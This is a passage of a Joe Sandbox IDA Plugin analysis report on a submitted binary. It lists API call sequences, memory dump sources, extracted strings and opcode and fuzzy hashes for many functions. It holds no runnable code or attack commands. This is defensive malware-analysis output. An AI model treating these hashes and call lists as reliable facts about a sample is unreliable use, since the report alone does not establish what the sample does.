                                                                                                                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000000,?,?,?,?), ref: 00405EAF
                                                                                                                                                                                                                                    • SetFocus.USER32(?,?,?,?), ref: 00405EB8
                                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00405EC8
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2313361498-0
                                                                                                                                                                                                                                    • Opcode ID: 714c78ee16b9d0c535b2ccd9b722d7140f358af2491426836a426c957dcc8526
                                                                                                                                                                                                                                    • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 714c78ee16b9d0c535b2ccd9b722d7140f358af2491426836a426c957dcc8526
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 00405F65
                                                                                                                                                                                                                                    • GetWindow.USER32(?,00000005), ref: 00405F7D
                                                                                                                                                                                                                                    • GetWindow.USER32(00000000), ref: 00405F80
                                                                                                                                                                                                                                      • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                                                                                                                                                                                                                                    • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Window$ItemMessageRectSend$Client
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2047574939-0
                                                                                                                                                                                                                                    • Opcode ID: e98f1b8ec4c98c4b3f876b541513d14ca347a33c497b9d7b5490fbbe5922d292
                                                                                                                                                                                                                                    • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e98f1b8ec4c98c4b3f876b541513d14ca347a33c497b9d7b5490fbbe5922d292
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetSystemTime.KERNEL32(?), ref: 00418836
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000010), ref: 00418845
                                                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 00418856
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000004), ref: 00418869
                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0041887D
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000004), ref: 00418890
                                                                                                                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 004188A6
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000008), ref: 004188B6
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 4218492932-0
                                                                                                                                                                                                                                    • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                                                                                                                                                    • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                                                                                                                                                                                                      • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                                                                                                                                                                                                      • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                                                                                                                                                                      • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000040), ref: 0044A8BF
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044A90C
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000040), ref: 0044A988
                                                                                                                                                                                                                                      • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000040,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A422
                                                                                                                                                                                                                                      • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000008,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A46E
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000000), ref: 0044A9D8
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 0044AA19
                                                                                                                                                                                                                                    • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 0044AA4A
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memcpy$memset
                                                                                                                                                                                                                                    • String ID: gj
                                                                                                                                                                                                                                    • API String ID: 438689982-4203073231
                                                                                                                                                                                                                                    • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                                                                                                                                                    • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000), ref: 00430D77
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memcpy
                                                                                                                                                                                                                                    • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                                                                                                                                                                                                                                    • API String ID: 3510742995-2446657581
                                                                                                                                                                                                                                    • Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                                                                                                                                                                                    • Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00405ABB
                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                                                                                                                                                                                                                    • SetFocus.USER32(?), ref: 00405B76
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: MessageSend$FocusItemmemset
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 4281309102-0
                                                                                                                                                                                                                                    • Opcode ID: 2f4c27367ad0dcd0df6ff95742fdfb823844e6920604fec48c7e171fffcef4b8
                                                                                                                                                                                                                                    • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2f4c27367ad0dcd0df6ff95742fdfb823844e6920604fec48c7e171fffcef4b8
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: _snwprintfwcscat
                                                                                                                                                                                                                                    • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                                                                                                                                                    • API String ID: 384018552-4153097237
                                                                                                                                                                                                                                    • Opcode ID: ceefa94603245cfdc84b5d7ac4d3bb9d057f1e5f82a05c255ee601070e84ce5a
                                                                                                                                                                                                                                    • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ceefa94603245cfdc84b5d7ac4d3bb9d057f1e5f82a05c255ee601070e84ce5a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                                                                                                                                                                    • String ID: 0$6
                                                                                                                                                                                                                                    • API String ID: 2029023288-3849865405
                                                                                                                                                                                                                                    • Opcode ID: a1397ef96222afd124a0cc802277b776f8ca8d8a268962530e532de87b957585
                                                                                                                                                                                                                                    • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a1397ef96222afd124a0cc802277b776f8ca8d8a268962530e532de87b957585
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00405455
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040546C
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00405483
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405498
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054AD
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memset$memcpy$ErrorLast
                                                                                                                                                                                                                                    • String ID: 6$\
                                                                                                                                                                                                                                    • API String ID: 404372293-1284684873
                                                                                                                                                                                                                                    • Opcode ID: 0330b9b22cd30b5b2625a0a7e6ceceae146d238a8b356c7611763844912e7754
                                                                                                                                                                                                                                    • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0330b9b22cd30b5b2625a0a7e6ceceae146d238a8b356c7611763844912e7754
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                                                                                                                                                                                                    • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                                                                                                                                                                                                    • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0040A0D9
                                                                                                                                                                                                                                    • wcscat.MSVCRT ref: 0040A0E6
                                                                                                                                                                                                                                    • wcscat.MSVCRT ref: 0040A0F5
                                                                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0040A107
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1331804452-0
                                                                                                                                                                                                                                    • Opcode ID: 23c89843948f9d4d6ccb23a927c15bd8e6af065920e5565f2ade9cfd678fbabf
                                                                                                                                                                                                                                    • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 23c89843948f9d4d6ccb23a927c15bd8e6af065920e5565f2ade9cfd678fbabf
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                                                                                                                                                                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                                                                                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                                                                                                                                                    • String ID: advapi32.dll
                                                                                                                                                                                                                                    • API String ID: 2012295524-4050573280
                                                                                                                                                                                                                                    • Opcode ID: b64713afd4556e5fbbb7ed04bcda3af9e72832f174230b27e3163565a40eb309
                                                                                                                                                                                                                                    • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b64713afd4556e5fbbb7ed04bcda3af9e72832f174230b27e3163565a40eb309
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    • <%s>, xrefs: 004100A6
                                                                                                                                                                                                                                    • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                                                                                                                                                                                                    • <?xml version="1.0" ?>, xrefs: 0041007C
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memset$_snwprintf
                                                                                                                                                                                                                                    • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                                                                                                                                    • API String ID: 3473751417-2880344631
                                                                                                                                                                                                                                    • Opcode ID: 2b06e63593618d13b5a5b8efcda018c795261ff0c1630acf280f9998f6f819b8
                                                                                                                                                                                                                                    • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2b06e63593618d13b5a5b8efcda018c795261ff0c1630acf280f9998f6f819b8
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: wcscat$_snwprintfmemset
                                                                                                                                                                                                                                    • String ID: %2.2X
                                                                                                                                                                                                                                    • API String ID: 2521778956-791839006
                                                                                                                                                                                                                                    • Opcode ID: 31c2c2b958cbfb7d79e881a69437bc30ebdfa5a8327fe047e8a0291744cff554
                                                                                                                                                                                                                                    • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 31c2c2b958cbfb7d79e881a69437bc30ebdfa5a8327fe047e8a0291744cff554
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: _snwprintfwcscpy
                                                                                                                                                                                                                                    • String ID: dialog_%d$general$menu_%d$strings
                                                                                                                                                                                                                                    • API String ID: 999028693-502967061
                                                                                                                                                                                                                                    • Opcode ID: 80a89c9967db9934379ab2cd2962a5087f7f7915bf37897dca38dc6723802d56
                                                                                                                                                                                                                                    • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 80a89c9967db9934379ab2cd2962a5087f7f7915bf37897dca38dc6723802d56
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • strlen.MSVCRT ref: 00408DFA
                                                                                                                                                                                                                                      • Part of subcall function 00408D18: memcpy.MSVCRT(?,?,00000008,00000008,00000010,00000040,?,?), ref: 00408D44
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00408E46
                                                                                                                                                                                                                                    • memcpy.MSVCRT(00000000,?,?,00000000,00000000,00000000), ref: 00408E59
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408E6C
                                                                                                                                                                                                                                    • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,?,?,00000000,?,00000000,00000000,?,00000000), ref: 00408EB2
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,?,00000000,?,00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408EC5
                                                                                                                                                                                                                                    • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408EF2
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,00000014,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408F07
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memcpy$memsetstrlen
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2350177629-0
